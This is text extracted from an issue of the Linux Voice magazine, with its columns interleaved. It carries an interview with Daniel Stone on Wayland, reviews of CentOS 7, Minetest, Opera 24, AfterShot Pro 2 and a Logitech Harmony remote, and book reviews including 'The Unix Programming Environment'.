like Krita enables new users to nice colour and start drawing. There are CMYK for ages? That’s what’s
experiment and play with all kinds of approximately 1 billion other options for making all these images look so crisp
new software. drawing stuff too. and lovely.
What’s so very good about Didn’t we read in last issue So where can we learn more
Krita then? that Krita was launching a about becoming the next
It’s powerful, so it takes a while to crowdfunding campaign? Alexander Rodchenko?
master. But you can get plenty of The Krita team are experimenting We’ve included a taster tutorial in
instant gratification by creating a new with what could become a this issue (see page 76). Go there
document and choosing one of the successful model for other open source now and be amazed! 39
Will 2014 be the year of Wayland on the Desktop?
Daniel Stone thinks so, and Ben Everard caught up
with him to find out why.
Windows first came out 30 at Collabora. He gave us the low-down
years ago, and it’s been at on what the problems are with X, why
the centre of Unix and Linux Wayland is better, what’s happening
graphics ever since. However, times with the project and when we’re likely
have changed, and X often struggles to see it come to fruition.
to take advantage of the capabilities Along with helping regular Linux
of modern graphics hardware. users get snappier graphics, Collabora
Linux needs a new display server, are working with the Raspberry Pi
and Wayland is the software that foundation to use Wayland to unlock
many people hope will keep Linux the graphical powers of the little
graphics moving forward. computer and create a much
Linux Voice headed over to smoother desktop environment.
Cambridge to meet Daniel Stone – a Despite a lot of talk, it hasn’t yet
long-term X contributor, prominent shipped in a major distro, though this
Wayland developer and graphics lead should change by the end of the year.
What will a regular Linux user there completely solid. I’m running alternate windows systems. If you go
notice when they install a Gnome Shell with Wayland on my back to kind of Berlin, Fresco or KGI,
distribution with Wayland for the laptop, and it’s actually really quite good. they just suffered really badly because
first time? I hadn’t really tracked any of Mutter or there were no video drivers at all. There
Daniel Stone: Our main aim is to get Gnome shell, so I was quite surprised by was barely any toolkit support. Definitely
out of the way! With X, you’ve got the X how quickly they were able to get it up. no 3D support. So yeah, just getting
server, the window manager and the over that mountain was really difficult.
clients. You’ve kind of got a window What have you found the But now half of the Mesa internals have
manager and a compositing manager biggest challenges to be in been rewritten. It’s just been a really
and there’s a three-way disaster. developing Wayland? really long slog.
We’ve tried to make that whole DS: It’s sort of been this 10-year Just trying to convince people that it’s
architecture as simple as possible – or ongoing thing. It’s the culmination of actually ready and usable has been
make the protocol as simple and everything we’ve done in X since about really tough as well. Around about a
straightforward as possible. I guess 2004. It’s not called X12, because it’s a year ago we had this huge spurt in
that’s the big thing: always being very different windows system [from development – to be fair I think you can
smooth and responsive and good. X11], but a lot of the work we did to look partially attribute that to Mir, but a lot of
at things like kernel mode setting, DRI2 that was that Red Hat had finished an
Do you have any idea when – all of that kind of thing – they’re all enterprise cycle and suddenly they had
we’re likely to start seeing really designed to get X out of the way a lot of guys come out and say “now
Wayland… Other than on Rebecca as much as possible. Partly because we’re actually free to start working on
Black OS of course. architecturally it was the right thing to this”. That really got us from a stage of
DS: Oh my God, why is it called that? It’s do, but then also there’s an explicit goal “we’ve got a windows system that looks
starting to appear. Fedora 21 – it’ll be to make it possible to actually develop like it should work and we’ve got these
“So far Nvidia are the only
ones who’ve tipped their hat
and said “yes, we are working
on Wayland support.”
toy clients; GTK kind of works and we’ve Avanti, Qualcomm and Broadcom – if DS: Mobile is a lazy shortcut for
got this toy desktop environment” to you want 3D, all of those need to add Arm-based! Wayland has been shipped
“we know this actually works and runs support to their drivers. That’s about as in a set-top box a couple of years ago, a
well on a proper fully-fledged desktop” much as I can say, unfortunately. TV and also the Jolla phone, so in terms
– that’s only quite recent. of actual mobile, we’re in a really good
Is it likely to be a difficult job spot because we worked together with
Intel has been quite active. to get drivers to run Wayland the Jolla guys to do libhybris [a
How have the other hardware on the desktop? compatibility layer to allow glibc-based
manufacturers responded to DS: It shouldn’t be! If it isn’t seamless software to run on bionic libc (the
Wayland? then we’ve done something really badly Android C library) systems]. We sort of
DS: For 2D support, if you have kernel wrong. On the desktop it should be did two halves of it, then they glued it
mode setting [KMS], then that’ll just totally fine. Mesa supports it fine, and together where you can reuse the binary
work fine. For 3D support, Nvidia have they all have KMS support, so in that blob – or if you have source, even better.
said publicly that they’re working on sense, it should be completely You can re-use the Android vendor
Wayland. Then you’ve got Arm with the seamless. On mobile, it’s just up to the drivers you get, and that just adds
Mali GPU, Imagination, PowerVR and manufacturer. So far, Nvidia are the only Wayland to any Android-capable
ones who have actually tipped their hat platform. That’s used on the Jolla
and said ‘yes we are working on Sailfish phone.
“If the switch to Wayland isn’t Wayland support’.
Do you mind telling us a bit
seamless then we’ve done When you say on mobile, about how you got started
something really badly wrong.” which mobile platform are you
talking about?
contributing to open source and
Free Software? 41
Wayland has brought huge
improvements to the graphics
of low-power devices such as
the Raspberry Pi.
DS: I think I got started with either KDE when we had the old build system with Gnome Shell and Mutter are separate. It
or Debian, I can’t remember how. everything whacked in one and it took a shouldn’t look any different than it does
day to build. Modularisation was really now where you just pick a window
Was it KDE on Debian? great, but we kind of took it one step too manager basically.
DS: There was also that, but that far and ended up with something like
was later on. Yeah, I just trundled along 380 different modules. Most of them What would you say you’ve
doing a couple of small KDE bits on never change, but it went a bit too far in learned from XFree86? It’s one
their IM client (Kopete), and a lot of the other direction. Now we’ve just got of the best pieces of software, and
packaging in Debian. For some reason, I Wayland and Weston and whatever GL it’s adapted and interconnected
ended up maintaining Apache 2 and stack you have. Fingers crossed, it won’t everything. Is there anything from
KDE and then started working on get out of hand! the success of X that’s gone into
XFree86, which I kind of got tricked into. Wayland? Like that the client and the
From a user’s perspective, will server are the wrong way around?
So you got all the good jobs! they need to know the DS: We kept that one! I guess it’s
DS: Yeah! I was working at a compositing manager from the easiest to look at the things we did
college at Melbourne Uni and they said window manager? differently. X has this awkward thing
“We’ve just got this new lab and we DS: We merged those! The key where the clients mostly render
need a new version of X to support the architectural change is that the window everything, but then you get the server
new Intel GPU. Do you reckon you could manager and the compositing manager to do about a third of it.
do that?” I thought that’d take about a got merged into the display server, so Longevity is kind of hard to pick
week, then a year later… That was right we’ve got Weston, which is our because, as I said, we spent 10 years
about the time of the XFree86/ reference compositor, and that has digging all of these bits out of X, and
split. Somehow I did the modular build plugins. It’s got a super basic UI on top before that, there was no real alternative
system for the X server, then I did a of that. The IVI [In-Vehicle Infotainment] either. It’s partially artificial. I guess it
bunch around that, and I gradually got guys have been working on their own taught us that no matter how high you
dragged into working on the core server. shell for automotive stuff. make the barrier to entry, people will still
It was pretty much 11 years ago… I’m The new desktop we released for the do it. I’ll have to think about it…
still here! It was a miss-spent youth. Pi, called Maynard, is a Weston module.
It runs in-process, which is really nice, We suppose X always did the
How much easier is Wayland but by the same token, we don’t have to job, despite being complicated.
going to be to package than re-invent the compositor. DS: It’s definitely mostly good enough. It
XFree86 was? Other projects like Kwin – I think – are was quite easy to push it in some quite
DS: So much easier! It was a disaster doing their own compositor. Definitely unexpected directions, so it was this
infinitely flexible framework that you Will there be an easy out of X, and also libhybris which we
could make do almost anything. equivalent to VNC? originally did to run Wayland on Android
DS: There’s already an RDP [remote – they were able to take that and run
We remember being amazed desktop protocol] back-end for Weston, Mir on top of it instead. We’re both
that you could get anti-alised and the RealVNC guys have been on the standing on the same foundations.
fonts. Just the fact that you could Wayland list looking into doing
patch something old to come up something quite similar. One of the Do they re-use your driver
with something new. Then wobbly things we did – it’s almost a happy hooks?
windows as well! accident, but partly by design – makes DS: No. Not for EGL.
DS: That was a blessing and a curse! it much easier for the compositor to
Inside the X server, it’s not a clear, stream out windows externally, so you So they have their own?
straightforward process that everything can do things like the hangouts or DS: The last time I looked, they
flows through. You’ve got this one Skype-style screen show. hadn’t got that far yet. They can’t re-use
the EGL hooks directly because the EGL
“We just kept adding more
How much work is it to convert extension is literally: here is a struct for
an X driver to Wayland? the display, and you can call Wayland
layers… in the end it made it DS: Not a lot if you already have methods on it. It’s so baked into that
really hard to work with.”
something that can already to a that they can’t re-use it. In terms of the
composited X server, which is fewer open source infrastructure, they
than you’d think. wouldn’t have been able to do that
without KMS, much like we couldn’t
massive structure that everything Is it just renaming a few of the have done Wayland without it, without
hangs off which has about 50 function calls? all the Mesa EGL work, without libhybris,
pointers in it, and everything goes DS: Simplifying a lot of them! One of the without XKB being common (which I did
through those. We just kept adding things we did which ends up making it a for Wayland) they wouldn’t have
more and more layers. It was great that lot easier for driver manufacturers is – keyboard handling. It also took a hell of
it allowed us to do that, but in the end it you know previously the X server would a lot of work to go into GTK 3 and make
made it really hard to work with. load the graphics driver which was it not just an X-only toolkit. Mir re-uses
Things like composite were done with specific to the 3D hardware and the all of these foundations as well.
the core being completely unaware that display controller, and then you had your
the composite was ever there. We just client-side GL library and they had to Does this mean you’ll need
wrapped everything up and did a couple agree on a protocol. You had to get this separate drivers for Wayland
of tricks on the way in and undid them marriage between what you had on the and Mir?
on the way back out. It made it client and the X server driver you had, DS: There’s now an EGL platform
incredibly fragile and hard to work with. and your display controller as well. We extension which now says instead of ‘I
Things like minor rendering bugs (like broke that out quite nicely. That was want to open a display’, ‘I want to open
when the screen flashes black for a something that took a couple of an X display’, or ‘I want to open a Mir
second) – you wonder why that iterations of refining before we got right, display’, so you can now ship a single
happened and three weeks later you but it’s now split out so that all of the blob which supports all of them.
come out with the answer. Wayland 3D stuff lives in the GL library
rather than the X server that had an API But it would need to have the
that changed about every six months. Mir bit in it as well as a
Wayland bit?
Will Wayland make it easier for DS: Exactly. The Wayland part of that
Nouveau, Lima and the open extension is already ratified by Khronos,
driver projects? and that’s part of their official set of
DS: Most of their complexity is extensions
unrelated to be honest. We’ve got a nice
clean split between the windowing Will 2015 be the year of
system and the actual rendering – Wayland on the desktop?
which is reflecting in the GL and GLES DS: I think so. We’re already seeing it in
– so it doesn’t make any odds to them set-top boxes because for that kind of
to be honest! All that infrastructure’s in stuff where we can say “We can
core Mesa and they don’t have to deal guarantee you super low latency, and no
with it – much as I’d love to say yes. jitter – you can actually use overlays,
which you can’t in X, that sort of thing”.
What are your thoughts on They’ve already taken a shine to it. I
“Intel are hugely involved in
Mir? really hope Fedora 21 give the desktop a
Wayland development – they are
completely behind it. DS: They’re doing their own thing. That bit of a kick. It is actually really
builds on ten years of us extracting stuff remarkably solid, at least on Gnome. 43
The latest software and hardware for your Linux box, reviewed
and rated by the most experienced writers in the business
On test this issue...
46 48
Andrew Gregory
Believes that Dogecoin is the future currency
for the digital world. Much money, very wow!
he other day I was watching a
video interview with Richard CentOS 7 Minetest 0.4.10
Stallman. The interviewer Enterprise-grade Linux, for free. Graham Mike Saunders climbs hills, explores
obviously had no clue about GNU, Linux Morrison examines the first release caves and swims over oceans in this
and FOSS, and threw all kinds of inane following the Red Hat + CentOS team-up. surprisingly good Minecraft clone.
questions at the great RMS. At one
point I expected Stallman to get up and 50 51
walk away, but he answered the daft
questions with patience and good
manners. The worst point came when
the interviewer asked if Free Software
was anti-capitalist, and how anyone
could make money from stuff that was
given away for free. Surely it’s all some
commie hippie nonsense for people
Opera 24 AfterShot Pro 2 Smart Control
with no grasp of economics, right? It looked like Opera for Our staff photographer, Too many remote controls
Linux was dead, but the Graham Morrison, attempts spoiling the broth? Wish you
Doing the right thing comeback starts here. to release himself from the could consolidate them all
Stallman explained how companies Ben Everard finds out how it ion grip of Adobe with a into a nice little mobile app?
can make plenty of money selling stacks up against Firefox pro-level image processing Graham Morrison tries this
support and services around a Free and Chrome/Chromium. application. solution from Logitech.
Software project. One of the examples I
always give, when people ask me
similar questions, is Red Hat: here’s a BOOKS AND GROUP TEST
company built on FOSS principles, with
In a slight departure from the norm, one of our books
a primary product (RHEL) that’s
this month hasn’t just arrived on the shelves – no,
available for free (CentOS). Red Hat has it’s actually from 1983. ‘The Unix Programming
made plenty of money releasing its Environment’ is one of the most important works in
work as open source and selling computing history, as it’s from the original Unix
support contracts, and demonstrates developers. Linux is a modern beast today, but so
much of its design and principles stem from those
how the whole model can work very
early Unix flavours, so it’s great to look back.
successfully. It’s a million times better Meanwhile, our Group Test this issue looks at tiling
than prising money out of people by window managers. These can save you lots of time
locking them in to proprietary wares. and help to manage your screen space better. 45
CentOS 7
Graham Morrison finds the ultimate upgrade path for his own low-end-box, a distro
ideal for servers and offices built from Red Hat’s super-audited source code.
eviewing Linux distributions is like reviewing
DATA music. Should the reviewer be an old school
devotee? A potential new listener, or just
Developer CentOS interested in seeing what’s happening? Should they
Project care that an artist split from a boyband. Or that one
Licence Mostly GPL distribution is very similar to another distribution.
What about KDE versus Gnome, mods versus rockers,
GNU versus open source? On the one hand you have
to say whether something works, or whether it’s worth
your time and investment, or whether a work has
accomplished whatever it set out to do. On the other
hand, there is always going to be a hardcore of fans
who will love any new output, regardless of any
criticism, and they may have a point. A review seldom
tells the whole story. CentOS, for example, inherits
nearly all of its options, installation, software and The new graphical installer and command-line utilities make
updates from Red Hat Enterprise Linux, but that CentOS easier to administer.
doesn’t mean we shouldn’t take a look. Quite the
opposite. We’ve been using it for years and it’s a vitally secure Linux distributions you could choose, along
important distribution. Version 7 might just be the with assured updates handed down from Red Hat,
best yet. it gave Red Hat a trial of conscience. If Red Hat was
CentOS, then, would be like an old 1960’s cover to embrace open source in the way it said it wanted
band. Tough, reliable, surviving against the odds, and to, it would have to put its faith in Free Software and
still holding on to a renegade attitude that brought accept its free competitor, even if that meant ignoring
initial success. That success came when it flew in its own worried sales people.
the face of Red Hat by building its own packages
You can choose between
Gnome 3 and KDE for your out of Red Hat’s much flaunted Enterprise Linux; the The Prefab Four
desktop, making CentOS a commercial Linux distribution at the heart of Red For many years, the two co-existed in what seemed
good choice for offices and Hat’s rampant business model and success. Not only like passive tolerance. CentOS carved out a significant
parents. did this give the wider community one of the most niche for itself, sitting between the cutting edge of
Fedora and the besuited sobriety of Red Hat
Enterprise Linux. In particular, it’s been able to
capitalise on the insane demand for cheap online
servers, low end boxes and racks of virtualisation,
allowing beleaguered sysadmins to get their hands on
enterprise-level security and updates without the
associated support costs. Red Hat, meanwhile,
continued to make money from its ‘Value Add’ and
many of us thought this would be the way things
would continue.
All this changed in February when Red Hat
announced it was going to hire many of the core
CentOS developers and pay them to continue
developing CentOS, not Red Hat. It marked a
significant change in strategy, and the hugely
anticipated CentOS 7 is the first release since the
merging of the waters. It comes bound to a wide array
of ISO images, from a Live CD with either Gnome or
KDE, through a 362MB network install disk, up to a
monster 6.6GB DVD containing everything. It’s great to
have the option of grabbing an install medium that’s
not going to place too many additional demands on
your network, or CentOS’s servers, so we went for the
What does Red Hat think?
We recently had the opportunity to talk to Jan Wildeboer, Red
Hat’s EMEA evangelist, and he had a few insightful words to
say about the new working relationship with CentOS, especially
when faced with the question of whether CentOS lost Red Hat
any sales.
“I always said, both internally and externally, that’s the record
industry argument. With pirated music taking revenue away,
where else would it come from? But just because somebody
copies a song 20 times doesn’t mean they would have bought
20 CDs. And that’s wrong, and I think from my evangelism
perspective, the customer who uses CentOS over RHEL is a user
or a customer that we failed to deliver our Value Add message
“There are a few things that make CentOS important. First
thing is, of course, CentOS has a user community that helps us
in making our product better. We listen to them. On the other
hand, CentOS being re-built from our sources is a sign that
everything is just as it should be at the middle of the company.
The third thing is that CentOS has never been Red Hat Enterprise
Linux - there will always be differences here and there - they’re
not binary compatible.” Jan Wildeboer is a rather inspirational voice of reason.
full-fat install for our system. course), which is especially helpful if you run CentOS
For an operating system built for servers, within a virtual machine. And we liked the inclusion of
installation is a graphical breeze. This is thanks to the Network Manager’s curses interface. But these are all
updated Anaconda installer, and it looks fantastic. features you’ll find in RHEL. What we’re really looking
As usual, you can select the quantity of software you at is CentOS as a free alternative, and after years of
want, as well as the graphical environment. You can’t use in some important installations, we have every
multi-select between Gnome and KDE, for example, confidence in the operating system, more so now that
but that’s an easy job post-install, and there’s no sign much of its development is guided by Red Hat. That
of Fedora’s commitment to Gnome 3. We’ve only means potential
ever used CentOS on a server and without a GUI, users can start with
so this shouldn’t affect most installations. You can
also create a user-account and password while the
CentOS and move
on to Red Hat, which
“If XFS is good enough for
files are being transferred to your drive, even if the was never a clear NASA’s Supercomputing Division,
placing of the ‘Done’ button in the top left is a little path previously, or it’s good enough for us.”
incongruous. stay with CentOS
with Red Hat’s
Starship Enterprise blessing. It also gives safe harbour to Fedora fans
The default file system is now XFS. This is significant looking for something less entropic.
because it puts scalable data requirements and the There is, of course, much we haven’t said. In use,
storage market at the heart of the operating system, we’ve found our server easier and more intuitive
ahead of the regular desktop and . But it also marks to maintain and the cloud-bias will keep the sales
the tearful end of ext3’s and ext4’s dominance in people happy. But what’s important is that CentOS is
favour of more esoteric or tailored file systems. But if stronger than ever, and the new release has a desktop
XFS is good enough for NASA’s Advanced bias that may win it new corporate friends whilst
Supercomputing Division, it’s good enough for us. The safely corralling Red Hat’s cloud juggernaut into its
scalable aspect creeps into other parts of this release. packages. Without the finances to pay for support,
There’s now support for Linux Containers which may CentOS is our choice for a long-term supported Linux
bring us even cheaper low-end-boxes and certainly operating system. With in-place upgrades (yet to
provides an excuse to mention Docker. These may all come) and a ten year lifespan, there’s nothing quite
be the side-effects of Red Hat’s cloud ambitions, but like it. Maybe not so much a cover band, then. Maybe
you can’t help to notice CentOS’s own advert for more like the Rolling Stones.
Cloud-instance SIG in the installer, suggesting that
there’s more going on that a straightforward rebuild of
We love CentOS, and version 7 feels even
We’re now used to systemd, so its inclusion is no better for both features and for its closer
longer a shock. For our own servers, we’re grateful ties to Red Hat. Highly recommended for
for the for the new firewall daemon as our own IP cheap servers everywhere.
tables hacking leaves a lot to be desired. 3D graphics
drivers are included by default (non-proprietary, of 47
Minetest 0.4.10
Mike Saunders spent months trying to escape his Minecraft addiction. He thought
he was out, but some open source hackers pulled him back in…
ait a second – isn’t this a game? Shouldn’t
DATA it be in the Gaming on Linux section earlier
in the magazine? Well, maybe, but Minetest is so much more than a simple plaything. It’s a world
Developer simulator, a construction engine, a sandboxed
Perttu Ahola and team environment to build anything you want. At least, that’s
Price the goal – it’s still undergoing heavy development.
Free under GNU GPL
Minetest is an open source clone of Minecraft, the
phenomenally popular block-building game that has
sold over 50 million copies around the world.
Minecraft addicts spend weeks and months
completely absorbed in the game – and when they’re
not playing it, they’re watching videos of other people
constructing amazing things. It can be played alone, Given enough time, you can build almost anything (image
but it comes to life in collaboration with other users on courtesy of Krock on the Minetest Forum).
the internet. It’s like the best of Elite, Mercenary and
virtual reality combined into one game. Most players start by gathering wood and creating
Although Minetest is available in the package tools that can be used to mine more robust materials
repositories of many popular such as stone and iron. Minetest provides a crafting
“It’s like the best of Elite, distros, it’s a shame there
isn’t a distro-agnostic static
table in your inventory by default, so you don’t have to
create one from scratch as in the original Minecraft.
Mercenary and virtual reality binary to download. We There are various subtle differences like this scattered
combined into one game.” managed to get the latest
release via an Ubuntu PPA,
around the game, but by and large it’s very familiar to
anyone who has spent time with Notch’s masterpiece.
however. Fire it up and
you’re asked to create a new world; choose a map A world of your own
generator (v6 works best at the moment) then select Minetest’s worlds are vast and expansive, with
“minetest” as the Game type, and you’re ready to go. different biomes for woodland, mountains, desert and
As in regular Minecraft, you’re dropped onto a vast so forth. Dungeons are not enabled by default, but you
landscape with nothing else – no instructions, no can turn them on via a configuration option. Visually
tools, no plotline to follow. Using the WASD keys to it’s attractive and smooth, performing just as well as
walk and the mouse to look around, you can start Minecraft on our test box, although the sound effects
digging and collecting blocks using the left button. To are rather weak (you’d expect more than silence after
Minetest’s worlds are full place a block, use the right mouse button. To switch jumping from a mountain into water, for instance).
of fields, mountains, between the different things that you’re carrying, use Another area that’s lacking is non-player characters.
oceans and caves. the mouse wheel. And that’s it – good luck! Minetest’s worlds are empty and lonely, but mods are
available to pep things up with life. In fairness,
Minetest hasn’t even reached version 0.5 yet so
there’s plenty of work to be done – we’re not criticising
it. The reason we wanted to cover it in Linux Voice is
because it has the potential to be very special.
Take the solid game foundations, add the giant
wealth of talent from the Free Software community,
and we could have the best video game – nay, world
simulator – of all time. Then throw in an Occulus Rift
and you may never want to leave your house!
Missing some features and rough
around the edges in places, but could
eventually be bigger than Minecraft.
Opera Developer 24
Ben Everard can never have too many web browsers, so he installs another.
Those videos of kittens won’t watch themselves, you know.
or almost 20 years, Opera has been a good
browser, but never quite managed to gain
much traction on the desktop. Yet we as Linux
users should know that just because a product’s
market share hovers around 1%, it doesn’t mean that
the software isn’t any good. Has this new version got
what it takes to finally push it mainstream?
The first thing we noticed on starting up Opera was
the interface. It’s obvious that the developers have put
a lot of effort into making this work really well. For
example, if you hover the mouse over a tab, you get a
large preview of the web page in the tab. Opening
menus (and other graphical transitions) fade in and
out rather than abruptly change. This has quite a
pleasing effect, particularly on the full screen
transitions like adding a new option to the speed dial. The Stash provides an alternative to the ususal bookmarks and speed dial methods of
None of this has any effect on how the browser getting to your most frequently accessed web pages.
actually functions, but we still love it.
Underneath the GUI, this is the first version of Opera the bookmarks. It wasn’t entirely clear to us what it
for Linux to be based on Google’s Chromium code added beyond the other two, but some people might DATA
rather than WebKit. Since Blink (the Chromium find a use for it.
rendering engine) has only recently forked from
WebKit, you shouldn’t expect any drastic changes Free as in non-free developer
soon. As you can see from the diagram below, Opera Of course, we haven’t yet mentioned the huge Developer
performance is roughly similar to Chrome’s although a elephant in the room. Opera isn’t free-as-in-speech Opera Software
little worse in most cases. We don’t think it’s enough software (it is free as in beer), and probably never will
to be noticeable though. be. It’s built on the Blink rendering engine, but since
The one thing that Opera does differently is in this is released under BSD and LGPL licensed, Opera
marking items that you want to return to later – or Software is allowed to use it in a closed product. The
bookmarking. This has been around since the early only tempting feature of Opera that isn’t easily done in
days of the web and hasn’t changed that much on free software is its Turbo mode. This is essentially a
most web browsers. Opera now enables you to save proxying service that compresses web pages before
items to three places: bookmarks, stash and speed sending them to you, and can make a huge difference
dial. The speed dial is what opens when you create a on slower internet connections. Unless you’re
new tab. Bookmarks work in the traditional sense. The dead-set against closed software, it can be good to
stash is a vertical scrolling list that you can view on a have Opera installed on a laptop as a backup browser
full page, and is halfway between the speed dial and in case you get stuck on a slow connection.
The Opera add-ons site lists 750 extensions. This
isn’t as many as more mainstream browsers, but
RWBench should include everything most people need.
Speed-battle Octain
At the moment, the only Linux distro that Opera
Software is releasing a version for is Ubuntu, on the
basis that it wants to focus on a single platform. Of
course, it didn’t take long for there to be an Arch
Browser mark V8 Firefox
package created for it, and unofficial packages for
other distros may appear if it proves popular.
Peace-keeper Sunspider
Possibly the best-looking browser for
Linux, but it loses a point because of
the lack of freedom.
Opera performed well in the full browser benchmarks, and
less well on the tests that focused purely on JavaScript. 49
AfterShot Pro 2
A new update turns terrible photographer Graham Morrison
into a passable one. Almost.
or those into digital photography, there’s been a
DATA revolution in post-processing software over the
last decade. No longer does the photographer need to worry about exposure or white balance, or
Developer framing. As long as your DSLR shoots RAW, there’s a
Corel good chance software can take your bleached and
Price badly composed snapshot and turn it into a candidate
for Photo of the Year. And for once, Linux hasn’t been
left out in the cold. There are several excellent
post-processing tools, and one of the best was Bibble,
which was subsequently snapped up by Corel at the
end of 2011.
Bibble became AfterShot under Corel’s auspices,
and version 1.0 was released in early 2012. There Image processing is much faster, but we miss a faster
were a few updates, but for a long time all was quiet, feedback mechanism when adjusting values.
so we’re happy to see that the project is continuing
with the release of AfterShot 2. We installed it in Arch you’re importing and managing your collection
through its user repository as the only official through your own series of folders, tags and rankings,
packages are RPM and which is the other main reason for an application like
“ All these effects suffer from Deb. It would be nice to
see a pure binary
this. Image processing has been upgraded too, and
AfterShot Pro is the best Linux tool we’ve found for
the lack of decent, quick download, as there are lightening dark areas of a shot, increasing exposure
feedback in the main view.” very few external
dependencies. There’s
and noise reduction. All of these processes are
absolutely essential when putting together this
a trial you can unlock magazine, for example. Noise reduction in particular
with a licence, but before you do, make sure your has been much improved and is considerably more
camera image format is supported - RAW formats are powerful than the equivalent feature in Lightroom. But
specific to a camera’s make and model. all these effects suffer from the lack of decent, quick
feedback in the main image view, even if the final
Go faster render is quicker overall. We also miss the ability to
The big update for this release is speed, and while we view the pre and post filtered image side by side, as
didn’t do any side-by-side comparisons, image loading we quickly become desensitised to the changes we’re
The image management and processing was considerably faster. Importing a making.
views and the amount of batch of images, for example, was quicker than both The GUI in general could do with a bit of a
control you have over your the old version and Adobe’s Lightroom running on the makeover. We miss small things like a localised
collection is excellent. same hardware. This makes a big difference when thumbnail view for noise reduction (to avoid the cost
of processing the whole image), and the rotation tool
is unintuitive. Most of all, the GUI is tiny on anything
approaching a high-DPI screen and can’t be changed.
This is going to be a problem for photographers, as
high-resolutions screens are becoming increasingly
common and useful for proofing.
When there are few professional alternatives, this
update is a welcome release, and with the promise of
an HDR compositor in late summer, it’s still a near
essential tool for any wayward photographer.
Excellent processing tools and a
reasonable price held back mostly by a
tight and inflexible GUI
Harmony Smart Control
Graham Morrison discovers the one controller to rule them all. If only Logitech
would recognise there’s another rather excellent operating system
irst thing; this is a programmable remote
control with no Linux support. So why is this in
a Linux magazine? Because it’s the first
Harmony remote from Logitech that doesn’t require
either Windows or OS X. Specifically, you need an
Android device to make it work. This is significant
because the old Harmony series of remotes has been
the best-fit for complex home entertainment systems.
They allowed you to control an amplifier, a games
console, a digital receiver and a television from the
comfort of a single control in a relatively intuitive way.
If you pipe audio into an amplifier, for example, the
volume controls on your remote would send a signal
to this for volume whilst still sending channel
changing signals to your television. Setups like this are The base unit receives RF and wifi signals and beams out infrared and Bluetooth for Wiis
known as activities, and you could switch between and Playstations with up to two expanders, so you can lock your kit away out of sight.
different activities with a single button. You might
have an activity for listening to music, for example, enough for the whole household to use.
controlling just an amplifier and a music streamer, or
an activity for playing a games console - amplifier, Ultimate Control Web
games console and television. Logitech’s firmware This draconian requirement for Windows eventually
would take care of input switching and power led to the creation of a wonderful open source Developer
management, turning things on and off as you solution called Concordance, freeing us of both the
changed activities. It sounds complex and Microsoft tax and Logitech’s clunky web-alike £84.99
configuration could be, but after adding the devices user-interface. But the latest generation of remotes
and creating the activities, the results were easy don’t require a USB connection nor the use of a
desktop application. This is thanks to the Harmony
Hub, a base station that connects to your wifi network
and beams out instructions to your equipment. It’s
meant to be used predominantly with a smartphone
app that acts like a remote control, but we found it
clunky and unintuitive. Prodding a screen to pause,
fast-forward and rewind takes extra mental effort, for
instance, despite the physical volume keys on your
device being mapped to volume in your activity.
Luckily, the slimline remote that’s included with the
package as a stop-gap is more than adequate, and
100 times easier to use from the palm of your hand. It
communicates with the base station using RF, which
is incredibly liberating. You’re no longer restricted to a
line-of-sight technology that should have died out with
the compact cassette. And while there only enough
buttons to handle six different activities, we think
there’s just enough - and just enough for other levels
of control - to make it perfect for the majority of
A cynical 8 device limitation and lack
of Linux holds back what is otherwise
a brilliant piece of hardware.
Add, remove, assign and control your hardware from an
Android app or a physical remote 51
The Unix Programming Environment
When he came across a classic programmers’ book, Ben Everard had to take a look.
e came across this classic joining commands together is still perfectly
computing book in a second relevant. In fact, there’s almost nothing to
hand sale and couldn’t resist show that this section of the book wasn’t
looking at it to see if we could still use it with written recently.
a modern Linux system. It then goes on to show you how to write
The Unix Programming Environment isn’t a code that interacts with the system, and the
book about programming in general; it’s examples are written to make them easy to
about how to make your programs run well use in the middle of pipes. This includes
on Unix, and how to use the Unix tools to using standard in and out, using files, and
make your life easier. It starts with the basics other system calls. Probably the most
like logging in: “Be sure that the switches are surprising part of The Unix Programming
set appropriately on your device: upper and Environment is that the C code that it gives
lower case, full duplex, and other settings in the examples still works on our modern
that the local experts advise, such as the Linux machine.
speed or baud rate”. Well, it almost works. We typed in some of
We’ve been a little unfair with that previous the examples and found that most needed to
quote – it was specifically picked to make include more header files than were
the book sound old fashioned. In truth, necessary in 1984 (this produces the
surprisingly little has changed. The message “Warning: incompatible implicit
filesystem is a little different (home declaration of built-in function”). What’s
directories are no longer in /usr for instance), more, the design of these programs – taking
and the # character isn’t used as a input from stdin and outputting to stdout This book is a companion to The Unix
backspace any more, but on the whole, the and stderr – hasn’t changed, at least for Programmer’s Manual and The C Programming
text is very relevant to a modern Linux command line tools (the book doesn’t cover Language.
environment. Sometimes, the methods it any graphical tools). Again, there are some
recommends are a little antiquated, even new parts of Linux (/sys and /proc for However, for someone with a little experience
though they still work. Of course, you can still example) that aren’t covered, but this isn’t in Linux and who wants to know more about
edit text files in ed, though we don’t actually that important for most programs. it, this is still a good choice, especially for any
know anyone who does. aspiring programmer. Not everything in it is
The book goes on to focus on using the Practicals from the past completely relevant, but it covers the basics
shell and the tools that were relevant to The Unix Programming Environment builds up extremely well, and as you would expect, the
programmers in the 80s (sed, awk, grep etc). into a big project at the end, which is writing examples are insightful, and completely
These are still widely used and work in much and entire programming language (yes, based in the Unix way of doing things. There
the same way today. In many cases, the really) by combining C with programmer’s is also real geek-fun to be had in trying to
modern GNU versions contain more options tools such as yacc, lex and make. This was, spot the things that have changed in the
than the original Unix tools did, but the core for us, the best part of the book. Kernighan years since the book was
functionality is the same. This is especially and Pike are two of the most famous first published.
true of Bash when compared with the programmers of all time, and in this chapter, The fact that you can still follow a
original shell. There are a few cases, such as they take the reader step-by-step through 30-year-old programming book is testament
mail and news, where the commands do still their process of designing and building a to the stability of the Unix design that Linux
exist, but are rarely installed as usage non-trivial program. For us, the whole read has inherited. We got the book as a historic
patterns have made them mostly obsolete. was worth it for this alone. curiosity, but it turned out to be more useful
Of course, Unix isn’t about using individual It should come as no surprise that this that we anticipated.
commands – it’s about linking them book isn’t really suitable to a newcomer to
together. This principal lies at the heart of the world of Linux programming. There’s just
Unix, and so the chapter that focuses on too much modern stuff that’s missed out. LINUX VOICE VERDICT
Author Brian W Kernighan and Rob Pike
Publisher Prentice Hall
“For someone with a little experience of Linux who ISBN 0-13-937681-X
Price £48.99
wants to know more about it, this book is still a This book was published in 1984 – the same
good choice, especially for an aspiring programmer.” year Sinclair released the ZX Spectrum – yet
is still applicable to modern Linux systems.
Makers: A New Industrial Revolution ALSO RELEASED…
Makers will change the world, but Ben Everard isn’t sure how.
his book isn’t really about makers.
Not the average folks who go to
hackspaces and make stuff that
interests them. It’s about individuals and
small teams or entrepreneurs making
customer-oriented products.
Despite there being
